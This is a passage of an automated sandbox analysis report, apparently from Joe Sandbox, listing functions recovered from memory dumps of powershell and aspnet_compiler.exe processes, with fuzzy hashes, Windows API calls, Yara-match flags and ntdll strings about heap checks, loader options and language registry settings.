Instruction ID: 616929d4f5f93a1cc3c751f640f614949f6e997d1c8600b3e1b7df82111465aa
Opcode Fuzzy Hash: f40470e801a5671b705f11cf69945b47a8f2aaaa2319999acb5e49f623a37a29
Instruction Fuzzy Hash: FE514FB4A00205DFEB14CF55C594B9EBBF2BF49314F1980A9E505AB352CB72EE81CB91

Function 07CC09A8 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1650959775.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6881612bb90a36d8570152a5a45ebff5dc98758c7b7800bd0edafe391a537d3f
Instruction ID: 763f427a6f5bdd81c19efc97cc9788662bac5ac816917a226df0409f3643af22
Opcode Fuzzy Hash: 6881612bb90a36d8570152a5a45ebff5dc98758c7b7800bd0edafe391a537d3f
Instruction Fuzzy Hash: F931E8B0A04346DFDF24DE65CCA07BA7BA5AF41255F1880AED805DB192EB35C6C4C772

Function 07CC1EF8 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1650959775.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b23ffa5c32a4726b7351ba51136760f5dca1c204ccc6231e70f20571fae5f04
Instruction ID: 6ab7c635fde57721d0d534f067fd4e4a2fe8bfdfe022f4b6e6f4ca2d55f69db3
Opcode Fuzzy Hash: 6b23ffa5c32a4726b7351ba51136760f5dca1c204ccc6231e70f20571fae5f04
Instruction Fuzzy Hash: F43199F0A0431ADFDB15DF26C484AA9BBF5BF45210F1880AFD444DB262D735DA85CB92

Function 07CC1585 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1650959775.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f24a4e2f40995d88770ffb19b960cf6f30dba6e99c2e7d6c999f988ac1fb61d3
Instruction ID: 7b11513744d34d0d602196eaf47f1d39579f7ebd45fae199c594101268cea832
Opcode Fuzzy Hash: f24a4e2f40995d88770ffb19b960cf6f30dba6e99c2e7d6c999f988ac1fb61d3
Instruction Fuzzy Hash: E31151F191560ACFDB20DE5B8540276BBB1EB45614F2C40AEC505D7243EB35C655CB52

Function 07CC1598 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1650959775.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7cc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 025d408e9c7d46b4e5a70612c6af41daafec63e5e4d64c5edfe9ce9b38097f60
Instruction ID: c71c0d9aabed0a872a0421f0852d39b06407380ccee33f7f6a90577783f437eb
Opcode Fuzzy Hash: 025d408e9c7d46b4e5a70612c6af41daafec63e5e4d64c5edfe9ce9b38097f60
Instruction Fuzzy Hash: 6A012DF1A1460ECFCB24DE5BC54067ABBB5EB81621F6C40AEC50597243EB31C695CB92

Function 034FD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1614015744.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_34fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa94dd56c70c5ccf3af86c6a575ebe730289d03842e4e46c44e0e9e8bf5ecaa9
Instruction ID: f59f52ce80fad84fd59fa01ebe37974c1173f542a9ba37c7d8b54726c432483c
Opcode Fuzzy Hash: fa94dd56c70c5ccf3af86c6a575ebe730289d03842e4e46c44e0e9e8bf5ecaa9
Instruction Fuzzy Hash: A6012D7240E3C05FD7128B258894B52BFB4DF43228F1D80DBD9888F2A7C2699849CB72

Function 034FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1614015744.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_34fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e4ab0a648af80f616131f9b480d4399469f3debe818c965482a6c831d70334c
Instruction ID: 3e99a1426e0f91fa7700779765c8f77837a23c18ded540527919334df8bbb8c0
Opcode Fuzzy Hash: 5e4ab0a648af80f616131f9b480d4399469f3debe818c965482a6c831d70334c
Instruction Fuzzy Hash: B701F7318043449FE7108E15CC84B67FB98DF42628F0CC46BDE585F246C2799842CABA

Analysis Process: aspnet_compiler.exePID: 7936, Parent PID: 3520COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	5.3%
Signature Coverage:	10.6%
Total number of Nodes:	113
Total number of Limit Nodes:	13

Executed Functions

Function 004175D3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417645

Memory Dump Source

Source File: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 1d0f88e0e6ba56f344ef909ba5b018900d3faf01ae7809843121af1e57491e36
Instruction ID: 5d30bfda31744eed2288eea38138e939bbde262c23c4e3c022ec3d374f5692c1
Opcode Fuzzy Hash: 1d0f88e0e6ba56f344ef909ba5b018900d3faf01ae7809843121af1e57491e36
Instruction Fuzzy Hash: C20171B5E4020DBBDF10DBE5DC42FDEB3789B54308F4041AAE90897240F635EB488B95

Function 0042C4A3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4DA

Memory Dump Source

Source File: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
Instruction ID: 33488c65c50e967ce8032212b01be2a4ccc8566337b661b198c809349525c89b
Opcode Fuzzy Hash: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
Instruction Fuzzy Hash: 98E046762002187BD220AA6AEC41F9B776CDFC6724F44441AFA08A7281CBB4BA0186B5

Function 015F35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015F35CA

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82de95e9640697c35620daccbb899c2eb3a6020e18d9af7528f60227933143e3
Instruction ID: 04740445208a0367bea1166d17e2f99cf4d28277e79a32126c243bb879c5cc75
Opcode Fuzzy Hash: 82de95e9640697c35620daccbb899c2eb3a6020e18d9af7528f60227933143e3
Instruction Fuzzy Hash: 4C900231A0590442D105B5584914707100997D0201F65C811A44246ACEC7958A9166A2

Function 015F2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015F2B6A

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e94bc6978d7fcc568a10d48fe21c38e570833ca53f7670247569262259202196
Instruction ID: b64dbe47552d3c2e1e1a40c0ae21df5f4360f82149cd560b2b0f79d717e63e8a
Opcode Fuzzy Hash: e94bc6978d7fcc568a10d48fe21c38e570833ca53f7670247569262259202196
Instruction Fuzzy Hash: 8D90026160280043410AB5584814617400E97E0201B55C421E50146D4EC52589D16225

Function 015F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015F2DFA

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 182846498aab5d4d12cbaedc258204a4a3abd4b9f77dbbb1a4a7814115d21bba
Instruction ID: ada2767d4f18b12f9287d19d3f00685b5c97d563010e68f672c3c4eb1ecfd120
Opcode Fuzzy Hash: 182846498aab5d4d12cbaedc258204a4a3abd4b9f77dbbb1a4a7814115d21bba
Instruction Fuzzy Hash: 9D90023160180453D116B5584904707000D97D0241F95C812A442469CED6568A92A221

Function 015F2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015F2C7A

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7766b5e006eeb572199c2641a4422dbf4964173cb02c3fdbb726f3616ed20743
Instruction ID: a59c9c112ed0f2eab7d5c7bf282212d4ae8fb7794649d325126c18afe38b29e9
Opcode Fuzzy Hash: 7766b5e006eeb572199c2641a4422dbf4964173cb02c3fdbb726f3616ed20743
Instruction Fuzzy Hash: 2B90023160188842D115B558880474B000997D0301F59C811A842479CEC69589D17221

Function 0042C813 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C852

Strings

'cA, xrefs: 0042C816

Memory Dump Source

Source File: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: 'cA
API String ID: 3298025750-2370355221
Opcode ID: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
Instruction ID: 17d5cb76b4341d50fd7aa1bda6014d5d3e310c77e1840313bf8453552cdf047a
Opcode Fuzzy Hash: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
Instruction Fuzzy Hash: D8E06D712042087BD610EE59DC41F9B33ACEFC9710F404419F908A7241C774B91186B9

Function 00417653 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829426a3ec210af60e2c02bbd8d1fa420cdddcd0ddd37ade37f5b2cc5b7cef9b
Instruction ID: 13cd60f185a4a9e5f592b31b74b5d2527343d5b8502568d57bb4188afc094929
Opcode Fuzzy Hash: 829426a3ec210af60e2c02bbd8d1fa420cdddcd0ddd37ade37f5b2cc5b7cef9b
Instruction Fuzzy Hash: C521883250C3CA9BC716CF7C888A5CABFF5AE5322070882EDD4D59B193C316684BC785

Function 0042C7C3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E40E,?,?,00000000,?,0041E40E,?,?,?), ref: 0042C802

Memory Dump Source

Source File: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
Instruction ID: d9b28d67632644e52be635d512cdd863fcd8cc5184f4de7700c5ec6c30784a09
Opcode Fuzzy Hash: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
Instruction Fuzzy Hash: F4E09275354208BBD610EE59DC41FAB37ACEFC5714F00001AF908A7241D770B91087B9

Function 0042C863 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?), ref: 0042C89A

Memory Dump Source

Source File: 00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a4d4bde1c41013d22935837f348492cefa208b3edefa264fb9d256cbbf11bae2
Instruction ID: f3636df3db5ba9ab49c58778ad6cc278f2ad92603f3ac2d072733826d1314c23
Opcode Fuzzy Hash: a4d4bde1c41013d22935837f348492cefa208b3edefa264fb9d256cbbf11bae2
Instruction Fuzzy Hash: 17E08C7A200214BBD220FA6AEC42FDBB76DDFC5715F40405AFA08A7281C774BA0087F9

Function 015F2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015F2C24

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 562fd2a1b032732197b5db3c3d4c3c676c6bede5881ede20b8887e93ff702c68
Instruction ID: 6061486d4c6ce8fd5ab7705a82f68f67ec528a30fd10bbde28dba24627208a2f
Opcode Fuzzy Hash: 562fd2a1b032732197b5db3c3d4c3c676c6bede5881ede20b8887e93ff702c68
Instruction Fuzzy Hash: 09B09B71D019C5D5DA16E7644A0871B7904B7D0701F15C465D3030785F8738C1D1E275

Non-executed Functions

Function 01632349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 016325A0
MaxLoaderThreads, xrefs: 016324EC
MaxDeadActivationContexts, xrefs: 01632D82
MinimumStackCommitInBytes, xrefs: 01632BB0
DisableExceptionChainValidation, xrefs: 0163275F
DisableHeapLookaside, xrefs: 0163246D
RaiseExceptionOnPossibleDeadlock, xrefs: 01632579
minkernel\ntdll\ldrinit.c, xrefs: 01633187
TracingFlags, xrefs: 01632549
@, xrefs: 01632B74
UnloadEventTraceDepth, xrefs: 016324C0
LdrpInitializeExecutionOptions, xrefs: 0163317D
FrontEndHeapDebugOptions, xrefs: 01632489
GlobalFlag, xrefs: 01632F3F, 01633059
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01633176
ShutdownFlags, xrefs: 016324A1
@, xrefs: 01632942
CFGOptions, xrefs: 01632967
GlobalFlag2, xrefs: 01632FC0
UseImpersonatedDeviceMap, xrefs: 0163251C

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 87ab31519a228090f6ff25a03d71bd569311c5c833538526eab6cb3f7cf9b32b
Instruction ID: e6176d41bf12010c7f9897780b3f280e164d9eb8e7dbc4edec04880d1fa9b13c
Opcode Fuzzy Hash: 87ab31519a228090f6ff25a03d71bd569311c5c833538526eab6cb3f7cf9b32b
Instruction Fuzzy Hash: AB928B71608342AFE721DE29CC90B6BBBE8BBC4754F04492DFA959B350D770E845CB92

Function 016612ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 016618A5
HEAP: , xrefs: 01661706, 01661756, 016617A8, 01661809, 0166184D, 01661895, 016618E6
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 0166176D
Heap block at %p has incorrect segment offset (%x), xrefs: 0166181A
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 0166186B
Heap block at %p is not last block in segment (%p), xrefs: 016617B7
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 016618F8
Free Heap block %p modified at %p after it was freed, xrefs: 0166171B
HEAP[%wZ]: , xrefs: 016616CD, 016616F9, 01661749, 0166179B, 016617FC, 01661840, 016618D9

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 3395c206fc367b034a26090237568de560eba1f8c105764c4a3f9aed9c63d443
Instruction ID: e9df4601d17864bb0cb82cf8face986d65b06f8effbde8ca6a935bc16c2c1974
Opcode Fuzzy Hash: 3395c206fc367b034a26090237568de560eba1f8c105764c4a3f9aed9c63d443
Instruction Fuzzy Hash: 4D12BD30600646DFD725DF29C845BBABBF9FF8A714F18845DE4868B652E734E881CB90

Function 015AD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

PreferredUILanguagesPending, xrefs: 0160A8DE
Control Panel\Desktop\MuiCached, xrefs: 015AD62B
@, xrefs: 015AD49D
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 015AD3B6
Control Panel\Desktop, xrefs: 015AD45D
@, xrefs: 015AD663
MachinePreferredUILanguages, xrefs: 015AD685
PreferredUILanguages, xrefs: 015AD4B8, 015AD4C5
@, xrefs: 015AD3E9

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 9717039bd91fe2bbd3824decf2d7fb7daf6f7ec38f1c7716f460cbf6b6227532
Instruction ID: d42e2d9e086c2d799c93c05893fa2576d6975ec7f7f24ae4e56afac7c19f7236
Opcode Fuzzy Hash: 9717039bd91fe2bbd3824decf2d7fb7daf6f7ec38f1c7716f460cbf6b6227532
Instruction Fuzzy Hash: 7DB19E715483569FC726EF98C840A6FBBF8BB88744F41492EF989DB240D770DA04CB92

Function 01649179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

%s\%ld\%s, xrefs: 0164948D
\AppContainerNamedObjects, xrefs: 016494AB, 016494B9
\BaseNamedObjects, xrefs: 0164949E
%s\%u-%u-%u-%u, xrefs: 01649422
AppContainerNamedObjects, xrefs: 0164946E, 016494D6
BaseNamedObjects, xrefs: 01649477, 0164947C
Global\Session\%ld%s, xrefs: 016494C5
\Sessions, xrefs: 01649488

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: f5f8646afb9418210e4d7b276e0115480fee251ae74d7475e46a59d12b87548c
Instruction ID: 1517876043b7cfa09bd67e052415ae0b784a7a870f12c2d9b2e9a8a416471c7d
Opcode Fuzzy Hash: f5f8646afb9418210e4d7b276e0115480fee251ae74d7475e46a59d12b87548c
Instruction Fuzzy Hash: A0D1D672845326AFE721DB94CC40B6BBBE8BF98718F05492DFA449B250D770D904CBD6

Function 01660274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 016604D3
HEAP: , xrefs: 016603A6, 016604B5, 016605DD, 01660682, 016606D9
About to reallocate block at %p to %Ix bytes, xrefs: 016603BA
Just reallocated block at %p to %Ix bytes, xrefs: 016605F1
RtlReAllocateHeap, xrefs: 016602BF, 01660362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0166069F
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 016606EA
HEAP[%wZ]: , xrefs: 01660399, 016604A8, 016605D0, 01660675, 016606CC

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: f223f675a2b4debc7342591ff6e2fa7fb3e94fd7b60d61558097e22cda8dfde6
Instruction ID: 52b3c683991fd782d9152de5e0f1ce78d42543f09f87cd7d24f3a483a2c5ef90
Opcode Fuzzy Hash: f223f675a2b4debc7342591ff6e2fa7fb3e94fd7b60d61558097e22cda8dfde6
Instruction Fuzzy Hash: 80D1BC35600686DFDB22DF68CC40AADBBF9FF89604F488069F4469B352DB74E981CB54

Function 015AD08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 015AD2AF
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 015AD2C3
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 015AD0CF
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 015AD262
Control Panel\Desktop\LanguageConfiguration, xrefs: 015AD196
@, xrefs: 015AD313
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 015AD146
@, xrefs: 015AD0FD

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: f9c22597d930408ff0bf61018bebf65d323d04fc3a21100715d976aed14db0c5
Instruction ID: 35a610eb6e2a1a83ad077a5955d9f9e6ae8374a4db4ed75885bc2b98c21da8a7
Opcode Fuzzy Hash: f9c22597d930408ff0bf61018bebf65d323d04fc3a21100715d976aed14db0c5
Instruction Fuzzy Hash: 6CA16D719483469FD721DF64C880B6FBBF8BF84755F40892EEA989B240E774D908CB52

Function 015AF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0160DF64, 0160E0A8, 0160E286, 0160E39E
((LONG)FreeEntry->Size > 1), xrefs: 0160E0B3
(UCRBlock != NULL), xrefs: 0160DF6F
(!TrailingUCR), xrefs: 0160E3A9
HEAP[%wZ]: , xrefs: 0160DF57, 0160E09B, 0160E279, 0160E391
(LONG)FreeEntry->Size > 1, xrefs: 0160E291

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 84b8d4cf8c4783a08ddb85a2771a51d540ba097be15afd34ef309e69136d83bb
Instruction ID: 27c6fc5cb7316dacb0447dee2b16e63b264ca783e4234333b48c429983439be0
Opcode Fuzzy Hash: 84b8d4cf8c4783a08ddb85a2771a51d540ba097be15afd34ef309e69136d83bb
Instruction Fuzzy Hash: 6F42E1712487829FD71ADF68C884A6FBBE5FF88704F48896EE5868B391D730D841CB51

Function 015CB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

API set, xrefs: 016183F4, 016183F9
minkernel\ntdll\ldrutil.c, xrefs: 0161840D, 016184E1
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 016184D0
LdrpPreprocessDllName, xrefs: 01618403, 016184D7
SxS, xrefs: 016183ED
DLL %wZ was redirected to %wZ by %s, xrefs: 016183FC

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: b8b7fb0b06b4d6f129df7e910628cb922d7ee7360889aada1f0115fc15417186
Instruction ID: 833d8570f3a8e1e1439c8e107d8369e6c0713c459934197a30f4c666d96f6ba1
Opcode Fuzzy Hash: b8b7fb0b06b4d6f129df7e910628cb922d7ee7360889aada1f0115fc15417186
Instruction Fuzzy Hash: A9C13A31A002169FDB259FA8CC82B7EBBA9BF45B50F18406DED06AF291DB74DD44C391

Function 015E63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 01624258
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 016241FE
Process initialization failed with status 0x%08lx, xrefs: 0162413A
_LdrpInitialize, xrefs: 016240DF, 01624141, 01624205, 0162425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 016240D8
minkernel\ntdll\ldrinit.c, xrefs: 016240E9, 0162414B, 0162420F, 01624269

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
